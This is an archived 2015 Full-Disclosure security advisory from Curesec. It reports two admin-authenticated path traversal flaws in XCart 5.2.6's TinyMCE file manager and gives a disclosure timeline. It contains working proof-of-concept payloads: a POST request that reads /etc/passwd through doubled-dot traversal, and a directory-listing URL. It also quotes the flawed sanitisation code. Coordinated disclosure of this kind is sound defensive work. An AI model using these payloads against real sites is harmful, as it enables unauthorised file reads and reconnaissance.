| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <0MV0jR-1ZuMrD1gir-00YQem@mrelayeu.kundenserver.de>
Date: Fri, 13 Nov 2015 16:51:17 +0100
From: "Curesec Research Team (CRT)" <crt@...esec.com>
To: fulldisclosure@...lists.org
Subject: [FD] XCart 5.2.6: Path Traversal
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: XCart 5.2.6
Fixed in: 5.2.7
Fixed Version Link: https://www.x-cart.com/xc5kit
Vendor Contact: support@...art.com
Vulnerability Type: Path Traversal
Remote Exploitable: Yes
Reported to vendor: 08/13/2015
Disclosed to public: 11/04/2015
Release mode: Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Arbitrary File Download
Description
When downloading a file, the input is not properly protected against directory
traversal, which makes it possible to download arbitrary files.
Please note that admin credentials are required.
Proof of Concept
http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php
POST: path=/....//....//....//....//....//....//....//....//..etc/passwd&name=download.txt
Code
/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php:10
$path=joinPaths($root,$upload_dir,$_POST['path']);
$path=str_replace(LC_DS . '..', '', $path);
$name=$_POST['name'];
header('Pragma: private');
header('Cache-control: private, must-revalidate');
header("Content-Type: application/octet-stream");
header("Content-Length: " .(string)(filesize($path)) );
header('Content-Disposition: attachment; filename="'.($name).'"');
readfile($path);
3. List Directories
Description
It is possible to list the directories contained by any directory due to a
directory traversal vulnerability via the fldr POST argument. This may be used
to gather information about the target system.
Please note that admin credentials are required.
Proof of Concept
http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/dialog.php?type=0&editor=mce_0&popup=0&lang=en_EN&field_id=&fldr=../../../../../../
4. Solution
To mitigate this issue please upgrade at least to version 5.2.7:
https://www.x-cart.com/xc5kit
Please note that a newer version might already be available.
5. Report Timeline
08/13/2015 Informed Vendor about Issue
09/03/2015 Vendor Requests more time
10/19/2015 Vendor releases fix
11/04/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/XCart-526-Path-Traversal-85.html
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists